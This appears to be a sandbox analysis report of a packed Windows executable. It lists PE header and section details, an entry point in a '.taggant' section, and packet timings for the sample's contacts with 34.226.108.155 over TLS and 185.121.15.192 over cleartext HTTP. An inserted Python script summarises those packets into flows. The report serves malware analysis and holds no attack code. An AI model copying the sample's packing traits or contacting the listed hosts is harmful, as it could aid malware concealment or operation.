                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@.................................8;E...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x1088000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
TLS Callbacks: (none listed)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point, 0x1088000 in .taggant)
jmp 00007F78B88A646Ah
vmread dword ptr [eax+eax+00h], eax
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al   (repeated 93 times in the listing: the remaining entry-point bytes are all zero, and 00 00 decodes as this instruction)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x72b05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc86620 | 0x10 | pfhmiofh
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc865d0 | 0x18 | pfhmiofh
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x729000 | 0x283400 | cfd8b2c9f5f9f8157a780d9d1596e1bc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x72a000 | 0x2b0 | 0x200 | a80af98aedcb0edb555d60a90adac241 | False | 0.794921875 | data | 5.930781845028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x72b000 | 0x1000 | 0x200 | d6de82d14e357527731a70b0d9d5c0e8 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x72c000 | 0x398000 | 0x200 | cb8ba25c83752a6155274dddece77560 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pfhmiofh | 0xac4000 | 0x1c3000 | 0x1c2a00 | d693d8c4d091513d3cfde59953240de0 | False | 0.9944125996879334 | data | 7.9553931910835605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kvkhumva | 0xc87000 | 0x1000 | 0x400 | f00fb7e02e6f6eb2222a3698e8c19313 | False | 0.796875 | data | 6.185822119934874 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc88000 | 0x3000 | 0x2200 | 50a2806eaee21b80ecf4c7ae3425d080 | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc86630 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
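The packet table that follows lists one row per TCP segment, which makes the two network contacts hard to read as connections. The script below is an added example, not Joe Sandbox code: it folds such rows into per-flow summaries (client, server, packets in each direction, time of first contact relative to the first packet in the capture, duration). The embedded rows are copied from the table: the complete TLS exchange with 34.226.108.155:443, and the first ten plus the last packet of the cleartext HTTP exchange with 185.121.15.192:80. Taking the lower-numbered port as the server side, the service labels, and ignoring the CET zone label (only time differences are used) are assumptions.

```python
"""Per-flow summary of Joe Sandbox style per-packet rows. Added example, not Joe Sandbox
code; the rows are copied from the report's packet table (a subset), the rest is assumed."""
from datetime import datetime

PACKET_ROWS = """\
Dec 26, 2024 13:07:57.400774956 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:57.400832891 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:57.400911093 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:57.413261890 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:57.413314104 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.277690887 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.278919935 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.278955936 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.280205965 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.280322075 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.281682968 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.281749010 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.303189039 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.303201914 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.350631952 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.641666889 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.641782045 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.641905069 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.734586954 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.734627962 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:08:01.545851946 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.665527105 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.665618896 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.666589975 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.786658049 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.786694050 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.786763906 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.786814928 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.786822081 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.786844015 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.976298094 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7""".splitlines()
SERVICES = {80: "HTTP (cleartext)", 443: "TLS"}   # assumed labels for well-known server ports
EPOCH = datetime(1970, 1, 1)


def parse_ts(text):
    """'Dec 26, 2024 13:07:57.400774956 CET' -> integer nanoseconds on the capture's own
    clock. The zone label is ignored because only differences are used."""
    stamp, rest = text.split(".")
    frac = rest.split(" ")[0]
    secs = int((datetime.strptime(stamp, "%b %d, %Y %H:%M:%S") - EPOCH).total_seconds())
    return secs * 10**9 + int(frac.ljust(9, "0"))


def summarize_flows(rows):
    """Group packets into bidirectional flows keyed on (client, server), ordered by first
    contact. The end with the lower port number is assumed to be the server."""
    flows = {}
    for row in rows:
        ts, sport, dport, sip, dip = [c.strip() for c in row.split("|")]
        t, sport, dport = parse_ts(ts), int(sport), int(dport)
        to_server = dport < sport
        client, server = ((sip, sport), (dip, dport)) if to_server else ((dip, dport), (sip, sport))
        f = flows.setdefault((client, server), {"first": t, "last": t, "c2s": 0, "s2c": 0})
        f["first"], f["last"] = min(f["first"], t), max(f["last"], t)
        f["c2s" if to_server else "s2c"] += 1
    t0 = min(f["first"] for f in flows.values())
    return [{"client": f"{c[0]}:{c[1]}", "server": f"{s[0]}:{s[1]}",
             "service": SERVICES.get(s[1], f"tcp/{s[1]}"),
             "packets_c2s": f["c2s"], "packets_s2c": f["s2c"],
             "start_offset_ns": f["first"] - t0, "duration_ns": f["last"] - f["first"]}
            for (c, s), f in sorted(flows.items(), key=lambda kv: kv[1]["first"])]


if __name__ == "__main__":
    for flow in summarize_flows(PACKET_ROWS):
        print(f"{flow['client']} -> {flow['server']} [{flow['service']}] "
              f"{flow['packets_c2s']}/{flow['packets_s2c']} pkts, "
              f"starts +{flow['start_offset_ns'] / 1e9:.3f}s, lasts {flow['duration_ns'] / 1e9:.3f}s")
```

For a full capture, feed every row of the table. What the summary makes visible is the order of contact (TLS to the AWS-hosted address first, cleartext HTTP to 185.121.15.192 about four seconds later); the port-80 flow is where the report's "HTTP GET or POST without a user agent" observation would be checked, which needs the payload that this table does not carry.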
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 13:07:57.400774956 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:57.400832891 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:57.400911093 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:57.413261890 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:57.413314104 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.277690887 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.278919935 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.278955936 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.280205965 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.280322075 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.281682968 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.281749010 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.303189039 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.303201914 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.350631952 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.641666889 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.641782045 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:07:59.641905069 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.734586954 CET | 49699 | 443 | 192.168.2.7 | 34.226.108.155
Dec 26, 2024 13:07:59.734627962 CET | 443 | 49699 | 34.226.108.155 | 192.168.2.7
Dec 26, 2024 13:08:01.545851946 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.665527105 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.665618896 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.666589975 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.786658049 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.786694050 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.786763906 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.786814928 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.786822081 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.786844015 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.786870003 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.786892891 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.786932945 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.786943913 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.787008047 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.787009001 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.787046909 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.787061930 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.787101030 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.787106991 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.787121058 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.787154913 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.787173986 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.906558037 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.906610966 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.906661034 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.906688929 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.906723976 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.906759024 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.906760931 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.906800032 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.906832933 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.906861067 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:01.954546928 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:01.956568003 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.070584059 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.074471951 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.122699976 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.238535881 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.238627911 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.444375038 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.444469929 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.690783024 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.690855026 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.733987093 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.734222889 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.734318018 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.810720921 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.811006069 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854096889 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854202032 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854223967 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854233027 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854265928 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854285002 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854285955 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854335070 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854342937 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854374886 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854393959 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854418039 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854530096 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854567051 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854574919 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854629993 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854708910 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854754925 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854824066 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854866982 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.854908943 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.854954958 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.855037928 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.855088949 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.855564117 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.855618954 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.855628967 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.855988026 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.856040955 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.856261969 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.856647968 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.856722116 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.930813074 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.930926085 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.974117041 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974189043 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974241972 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974266052 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.974320889 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.974334955 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:02.974412918 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974478006 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974586964 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974647045 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974760056 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974875927 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.974983931 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975064993 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975198030 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975291014 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975374937 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975457907 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975533009 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975543022 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975915909 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975924969 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975970030 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.975980043 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.976180077 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.976241112 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:02.976298094 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
                                                  Dec 26, 2024 13:08:02.976308107 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976419926 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976429939 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976438999 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976449966 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976491928 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976556063 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976644039 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976654053 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976699114 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976733923 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976813078 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976821899 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976869106 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976878881 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976964951 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977035046 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977130890 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977140903 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977178097 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977186918 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977264881 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977274895 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977318048 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977328062 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977395058 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977442980 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977535963 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977545023 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977574110 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977627993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977682114 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977746964 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977785110 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977796078 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977924109 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977936983 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.996155024 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:02.996253014 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.050769091 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.050858974 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094120979 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094162941 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094192982 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094222069 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094275951 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094304085 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094331026 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.095148087 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.095231056 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.116112947 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116147041 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116177082 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116216898 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116255045 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116291046 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116393089 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116410971 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116420031 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116517067 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116585016 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116626024 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116713047 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116723061 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116832972 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116842031 CET8049701185.121.15.192192.168.2.7
